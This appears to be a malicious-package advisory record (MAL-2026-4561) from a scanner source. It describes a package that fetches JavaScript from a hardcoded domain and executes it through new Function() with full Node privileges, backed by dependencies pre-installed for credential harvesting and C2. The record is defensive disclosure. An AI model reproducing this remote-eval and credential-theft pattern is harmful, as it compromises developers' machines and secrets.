MAL-2026-4561

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (6181b15ad071542a35154cffc71bc4771db039f548eabfe4100271000e4e3116) The package's default-exported getPlugin function fetches https://svganchordev.net/icons/110 and passes the response's data.credits field to new Function() with require, process, Buffer, module, exports, and Promise injected — executing arbitrary attacker-controlled JavaScript with full Node privileges whenever a caller invokes the documented API. The endpoint is hardcoded to a domain unrelated to the package's stated purpose and is not referenced in README. Errors are swallowed and the request silently retried, which is consistent with covert C2 behavior. The declared dependency set (@primno/dpapi for Windows DPAPI decryption, node-machine-id, better-sqlite3 and sqlite3 for browser/credential database access, socket.io-client for persistent C2, axios/express/request) is unused by the small advertised utility surface (~30 lines of debounce/throttle/isEmpty helpers in src/utils.js) but is pre-positioned in node_modules so a remote-fetched payload can require() these capabilities without a second fetch. The combination — remote-fetch-and-eval plus a credential-harvesting toolkit pre-installed as dependencies — leaves no benign interpretation.